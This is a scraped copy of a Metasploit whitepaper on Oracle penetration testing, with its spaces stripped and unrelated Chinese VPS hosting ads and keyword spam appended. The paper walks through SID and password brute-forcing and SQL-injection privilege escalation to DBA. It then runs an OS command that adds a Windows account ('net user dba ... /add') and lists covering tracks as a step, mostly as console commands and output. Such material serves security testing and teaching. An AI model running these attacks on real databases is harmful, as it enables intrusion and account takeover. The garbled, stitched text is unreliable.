commandsnetuser

netuser  时间:2021-04-18  阅读:()
OraclePenetrationTestingUsingtheMetasploitFrameworkChrisGates&MarioCeballosMetasploitProjectAbstractOvertheyearstherehavebeentonsofOracleexploits,SQLInjectionvulnerabilities,andpostexploitationtricksandtoolsthathadnoorder,methodology,orstandardization,mainlyjustrandom.
sqlfiles.
Additionally,noneofthepubliclyavailablePentestFrameworkshavetheabilitytoleveragebuilt-inpackageSQLInjectionvulnerabilitiesforprivilegeescalation,dataextraction,orgettingoperatingsystemaccess.
InthiswhitepaperwewillpresentanOraclePentestingMethodologyandgiveyouallthetoolstobreakthe"unbreakable"OracleasMetasploitauxiliarymodules.
We'vecreatedyourversionandSIDenumerationmodules,accountbruteforcingmodules,portedallthepublic(andnotsopublic)OracleSQLInjectionvulnerabilitiesintoSQLImodules(withIDSevasionexamplesfor10g/11g),modulesforOSinteraction,andmodulesforautomatingsomeofourpostexploitationtasks.
ThemodulesarecurrentlyonlysupportedunderLinuxandOSX.
OraclePenetrationTestingMethodologyLocateasystemrunningOracle.
DetermineOracleVersion.
DetermineOracleSID.
Guess/BruteforceUSERNAME/PASS.
PrivilegeEscalationviaSQLInjection.
ManipulateData/PostExploitation.
CoverTracks.
LocatinganOracleSystemYouwilltypicallyfindmostOracleinstallationsbyperformingportscanninginthetargetnetblock.
TheOraclelistenerdefaultportis1521butcanlistenonanportgenerallyinthe1521-1540range.
YoucanalsodiscoveroracleinstancesbyscanningothercommonOracleports.
Reviewhttp://www.
red-database-security.
com/whitepaper/oracle_default_ports.
htmlforcommonOracleports.
GenerallyrunningaservicescanwillNOTgiveyoutheOracleTNSListenerversionbutupdatedfingerprintsfornewversionsofNmapmayyieldversionsinsomesituations.
cg@attack:~$nmap-sV192.
168.
0.
100-105-p1521StartingNmap4.
85BETA8(http://nmap.
org)at2009-06-1815:25EDTInterestingportson192.
168.
0.
100:PORTSTATESERVICEVERSION1521/tcpopenoracle-tnsOracleTNSListenerInterestingportson192.
168.
0.
101:PORTSTATESERVICEVERSION1521/tcpopenoracle-tnsOracleTNSListener9.
2.
0.
1.
0(for32-bitWindows)YoucanalsodiscoverOracleinstancesusingsearchengines.
AlexKornbrustofRed-Database-Securityhaswrittentwoexcellentwhitepapersdiscussingthissubject.
1,2TNSandOracleMixinsforMetasploit.
TwonewmixinshavebeenaddedtotheMetasploitTrunk.
ThefirstmixinisaTNSmixinthatallowsMetasploittocraftTNSpackets.
ThesecondmixinisanOraclemixinthatallowsustousesomeadditionallibariestowrapOraclecommands.
TheTNSmixinishandybecauseitessentiallyreplacestnscmd.
plyoucanpassanydatayouwantinsidetheTNSpacket.
Connectconnect_data="(CONNECT_DATA=(COMMAND=VERSION))"pkt=tns_packet(connect_data)sock.
put(pkt)sock.
get_onceres=sock.
get_once(-1,2)putsresdisconnectTheOraclemixinservesasthewrappercodeforruby-dbi,ruby-oci8,andtheoraclesqlplusclient.
Ithandlesconnectingtotheremotedatabase,sendingSQLqueriesanddisconnecting.
Thecoreofthisfunctionalityisfoundintheprepare_exec()method.
ThismethodconnectstothedatabaseusingDBIDBI.
connect("DBI:OCI8://#{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}","#{datastore['DBUSER']}","#{datastore['DBPASS']}")andthenpasseswhateverdata(SQL)youspecify.
function="CREATEORREPLACEFUNCTION#{p}RETURNNUMBERAUTHIDCURRENT_USERASPRAGMAAUTONOMOUS_TRANSACTION;BEGINEXECUTEIMMEDIATE'#{datastore['SQL']}';COMMIT;RETURN(0);1http://www.
red-database-security.
com/wp/google_oracle_hacking_us.
pdf2http://www.
red-database-security.
com/wp/yahoo_oracle_hacking_us.
pdfEND;"beginprint_status("Sendingfunction.
.
.
")prepare_exec(function)endDetermineOracleVersionusingMetasploitModules.
AOracleversionscannerusingtheTNSmixinhasbeenaddedtotheMetasploittrunk.
msfauxiliary(tnslsnr_version)>infoName:OracletnslsnrServiceVersionQuery.
Version:6479License:MetasploitFrameworkLicense(BSD)Providedby:CGBasicoptions:NameCurrentSettingRequiredDescriptionRHOSTSyesThetargetaddressrangeorCIDRidentifierRPORT1521yesThetargetportTHREADS1yesThenumberofconcurrentthreadsDescription:ThismodulesimplyqueriesthetnslsnrservicefortheOraclebuild.
msfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
100RHOSTS=>192.
168.
0.
100msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
100isrunning:32-bitWindows:Version10.
2.
0.
1.
0-Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
101RHOSTS=>192.
168.
0.
101msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
101isrunning:32-bitWindows:Version9.
2.
0.
7.
0–Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
102RHOSTS=>192.
168.
0.
102msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
102isrunning:Solaris:Version10.
2.
0.
1.
0-Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
103RHOSTS=>192.
168.
0.
103msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
103isrunning:Linux:Version11.
1.
0.
6.
0-Production[*]AuxiliarymoduleexecutioncompletedDetermineOracleSIDusingMetasploitModulesOraclepriorto9.
2.
0.
8willjustreturntheSIDifrequested.
After9.
2.
0.
8andforallnewversionsofOracleyouhavetoguess,bruteforce,orotherwisedeterminetheSID.
[*]Host192.
168.
0.
105isrunning:32-bitWindows:Version9.
2.
0.
1.
0–Productionmsf>useauxiliary/scanner/oracle/sid_enummsfauxiliary(sid_enum)setRHOSTS192.
168.
0.
105RHOSTS=>192.
168.
0.
105msfauxiliary(sid_enum)>run[*]IdentifiedSIDfor192.
168.
0.
105:PLSExtProc[*]IdentifiedSIDfor192.
168.
0.
105:cyxt[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:PLSExtProc[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:cyxt[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:cyxtXDB[*]AuxiliarymoduleexecutioncompletedBruteforcingtheSIDWeusetheServiceID(SID)listfromRed-Database-Security3andperformadictionaryattack.
msfauxiliary(sid_brute)>run[*]Startingbruteforceon192.
168.
0.
103,usingsidsfrom/home/cg/evil/msf3/dev/data/exploits/sid.
txt.
.
.
[*]FoundSID'ORCL'forhost192.
168.
0.
103[*]AuxiliarymoduleexecutioncompletedUsingotherOraclecomponentstodeterminetheSIDWecanuseotherOracleservletsandapplicationstolearntheSIDiftheyareavailable.
EnterpriseMangerConsoleexample:3http://www.
red-database-security.
com/scripts/sid.
txtmsfauxiliary(sid_enum)>run[-]TNSlistenerprotectedfor172.
10.
1.
108.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sid_enum)>useauxiliary/scanner/oracle/oas_sidmsfauxiliary(oas_sid)>run[*]DiscoveredSID:'orc10'forhost172.
10.
1.
109[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(oas_sid)>Servelet/spyexample:msfauxiliary(sid_enum)>run[-]TNSlistenerprotectedfor172.
10.
1.
108.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sid_enum)>useauxiliary/scanner/oracle/spy_sidmsfauxiliary(spy_sid)>run[*]DiscoveredSID:'orcl'forhost192.
168.
0.
103[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(spy_sid)>Guess/BruteforceUSER/PASSWeusePeteFinnigan'sdefaultpasswordlist4msfauxiliary(brute_login)>run.
[-]ORA-01017:invalidusername/password;logondenied[-]ORA-01017:invalidusername/password;logondenied[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(brute_login)>db_notes[*]Time:SatMay3008:44:09-05002009Note:host=172.
10.
1.
109type=BRUTEFORCED_ACCOUNTdata=SCOTT/TIGERSQLInjectionforPrivilegeEscalationmsf>useauxiliary/sqli/oracle/dbms_export_extensionmsfauxiliary(dbms_export_extension)>infoName:SQLInjectionviaDBMS_EXPORT_EXTENSION.
Version:$Revision:$Providedby:MCBasicoptions:NameCurrentSettingRequiredDescription4http://www.
petefinnigan.
com/default/default_password_list.
htmSQLGRANTDBATOSCOTTyesnoSQLtorun.
DBPASSTIGERyesThepasswordtoauthenticateas.
DBUSERSCOTTyesTheusernametoauthenticateas.
RHOST127.
0.
0.
1yesTheOraclehost.
RPORT1521yesTheTNSport.
SIDDEMOyesThesidtoauthenticatewith.
Description:ThismodulewillescalateaOracleDBusertoDBAbyexploitingansqlinjectionbugintheDBMS_EXPORT_EXTENSIONpackage.
msfauxiliary(dbms_export_extension)>setRHOST192.
168.
100.
25RHOST=>192.
168.
100.
25msfauxiliary(dbms_export_extension)>setSIDUNLUCKYSID=>UNLUCKYmsfauxiliary(dbms_export_extension)>run[*]Sendingpackage.
.
.
[*]Done.
.
.
[*]Sendingbody.
.
.
[*]Done.
.
.
[*]Sendingdeclare.
.
.
[*]Done.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(dbms_export_extension)>Verifyitworkedmsfauxiliary(oracle_sql)>setSQLselect*fromuser_role_privsSQL=>select*fromuser_role_privsmsfauxiliary(oracle_sql)>run[*]SendingSQL.
.
.
[*]SCOTT,CONNECT,NO,YES,NO[*]SCOTT,DBA,NO,YES,NOPostExploitationTheprimarymoduleforpostexploitationthatwillbereleasedisthewin32_execmodule.
Thismodulecreatesajavaclasstoexecutesystemcommands,executesthosecommands,thendeletestheclass.
Similartothis:http://www.
0xdeadbeef.
info/exploits/raptor_oraexec.
sql.
ThistechniqueisalsodiscussedintheOracleHacker'sHandbookbyDavidLitchfield.
msfauxiliary(win32exec)>setCMD"netuserdbaP@ssW0rd1234/add"CMD=>netuserdbaP@ssW0rd1234/addmsfauxiliary(win32exec)>run[*]CreatingMSFJAVAclass.
.
.
[*]Done.
.
.
[*]CreatingMSFprocedure.
.
.
[*]Done.
.
.
[*]Sendingcommand:'netuserdbaP@ssW0rd1234/add'[*]Done.
.
.
[*]AuxiliarymoduleexecutioncompletedUsefulSiteforOracleHackinghttp://www.
red-database-security.
com/http://www.
petefinnigan.
com/http://rawlab.
mindcreations.
com/http://www.
0xdeadbeef.
info/http://dsecrg.
com/http://www.
databasesecurity.
com/http://www.
davidlitchfield.
com/security.
htmhttp://www.
ngssoftware.
com/research/http://sourceforge.
net/projects/ingumahttp://www.
oracleforensics.
com/wordpress/DependencyInstallationInstructionsOracleMixinInstallNotesforLinux-testedonUbuntu8.
10&9.
04-startwithaworkingversionofmetasploittrunk#installoracleinstantclient#http://www.
oracle.
com/technology/software/tech/oci/instantclient/index.
html#recommendinstantclient10,thisshouldallowyoutotalkwith8,9,10,&11versions.
Grab*InstantClientPackage-Basic*InstantClientPackage-SDK*InstantClientPackage-SQL*Plus**notneededformetasploitbutusefultohave--unzipinto/opt/oraclecg@segfault:~/$cd/opt/oraclecg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-basic-10.
2.
0.
4-1.
i386.
zipcg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-sqlplus-10.
2.
0.
4-1.
i386.
zicg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-devel-10.
2.
0.
4-1.
i386.
zipitwillunzipeverythinginto/opt/oracle/instantclient_10_2/createyoursymlinkcg@segfault:/opt/oracle/instantclient_10_2$ln-slibclntsh.
so.
10.
1libclntsh.
so#Setupyourenviroment.
bashrcexportPATH=$PATH:/opt/oracle/instantclient_10_2exportSQLPATH=/opt/oracle/instantclient_10_2exportTNS_ADMIN=/opt/oracle/instantclient_10_2exportLD_LIBRARY_PATH=/opt/oracle/instantclient_10_2exportORACLE_HOME=/opt/oracle/instantclient_10_2#Installruby-dbi-0.
1.
1#http://rubyforge.
org/projects/ruby-dbi/#http://rubyforge.
org/frs/download.
php/12368/dbi-0.
1.
1.
tar.
gzcg@segfault:~$tarxvzfdbi-0.
1.
1.
tar.
gzcg@segfault:~$cdruby-dbi/(Hint:Catthe.
.
/ruby-dbi/READMEfileinanotherterminalforreference)cg@segfault:~/ruby-dbi$rubysetup.
rbconfig--with=dbi,dbd_pgcg@segfault:~/ruby-dbi$rubysetup.
rbsetupcg@segfault:~/ruby-dbi$sudorubysetup.
rbinstall#Installruby-oci8-1.
0.
0#http://rubyforge.
org/projects/ruby-oci8/#http://rubyforge.
org/frs/download.
php/28396/ruby-oci8-1.
0.
0.
tar.
gzcg@segfault:~$tarxvzfruby-oci8-1.
0.
0.
tar.
gzcg@segfault:~$cdruby-oci8-1.
0.
0/(Hint:Catthe.
.
ruby-oci8-1.
0.
0/READMEfileinanotherterminalforreference)cg@segfault:~/ruby-oci8-1.
0.
0$envcg@segfault:~/ruby-oci8-1.
0.
0$LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2/cg@segfault:~/ruby-oci8-1.
0.
0$exportLD_LIBRARY_PATHcg@segfault:~/ruby-oci8-1.
0.
0$env|grepLD_LIBRARY_PATHcg@segfault:~/ruby-oci8-1.
0.
0$makecg@segfault:~/ruby-oci8-1.
0.
0$sudomakeinstall#verifysqlplusworkscg@segfault:~$sqlplusSQL*Plus:Release10.
2.
0.
4.
0-ProductiononSunMay312:24:512009Copyright(c)1982,2007,Oracle.
AllRightsReserved.
Enteruser-name:#testtheOraclemodulesmsfauxiliary(sql)>run[*]SendingSQL.
.
.
[*]Oracle8iEnterpriseEditionRelease8.
1.
7.
0.
0-Production[*]PL/SQLRelease8.
1.
7.
0.
0-Production[*]CORE8.
1.
7.
0.
0Production[*]TNSforSolaris:Version8.
1.
7.
0.
0-Production[*]NLSRTLVersion3.
4.
1.
0.
0-Production[*]Done.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sql)>
展开全文

OneTechCloud香港/日本/美国CN2 GIA月付9折季付8折,可选原生IP或高防VPS

OneTechCloud(易科云)是一家主打CN2等高端线路的VPS主机商家,成立于2019年,提供的产品包括VPS主机和独立服务器租用等,数据中心可选美国洛杉矶、中国香港、日本等,有CN2 GIA线路、AS9929、高防、原生IP等。目前商家针对全场VPS主机提供月付9折,季付8折优惠码,优惠后香港VPS最低季付64元起(≈21.3元/月),美国洛杉矶CN2 GIA线路+20Gbps防御型VPS...

美国Cera 2核4G 20元/45天 香港CN2 E5 20M物理机服务器 150元 日本CN2 E5 20M物理机服务器 150元 提速啦

提速啦 成立于2012年,作为互联网老兵我们一直为用户提供 稳定 高速 高质量的产品。成立至今一直深受用户的喜爱 荣获 “2021年赣州安全大赛第三名” “2020创新企业入围奖” 等殊荣。目前我司在美国拥有4.6万G总内存云服务器资源,香港拥有2.2万G总内存云服务器资源,阿里云香港机房拥有8000G总内存云服务器资源,国内多地区拥有1.6万G总内存云服务器资源,绝非1 2台宿主机的小商家可比。...

AlphaVPS(€3.99/月)VPS年付15欧,AMD EYPC+NVMe系列起

AlphaVPS是一家保加利亚本土主机商(DA International Group Ltd),提供VPS主机及独立服务器租用等,数据中心包括美国(洛杉矶/纽约)、德国、英国和保加利亚等,公司办公地点跟他们提供的保加利亚数据中心在一栋楼内,自有硬件,提供IPv4+IPv6,支持PayPal或者信用卡等方式付款。商家提供的大硬盘VPS主机,提供128GB-2TB磁盘,最低年付15欧元起,也可以选择...

netuser为你推荐
本公司在线代理Servicemy支持ipad支持ipadcisco2960配置思科2960G交换机如何将配置百兆改为千兆配置sqlserver数据库sql server数据库是什么 型数据库美要求解锁iPhone怎么用爱思手机助手解锁苹果手机?期刊eset三友网网测是什么意思?银花珠树晓来看关于下雪景的诗句
动态域名 免费网站域名注册 上海服务器租用 域名查询系统 域名空间购买 国外vps租用 万网免费域名 域名商 香港bgp机房 免费ftp空间 网络星期一 主机屋免费空间 ixwebhosting info域名 镇江联通宽带 智能骨干网 全站静态化 数字域名 idc资讯 129邮箱 更多
赞助商
新泽西 拉斯维加斯 东京 何塞 保加利亚 半价 安装 重启 虚拟主机 安徽 硬盘 中国 路由器 华为 电信 网络 数据 俄罗斯 挪威 迁移 镜像 内存 域名 计费 日本 备份 美国 德阳 台湾 雅安 沙田 加利福尼亚州 机房 英国 抢购 活动 越南 支付宝 磐石 亚特兰大 带宽 防御 马来西亚 宿迁 阿里 欧洲 服务器 页面 亚洲 洛杉矶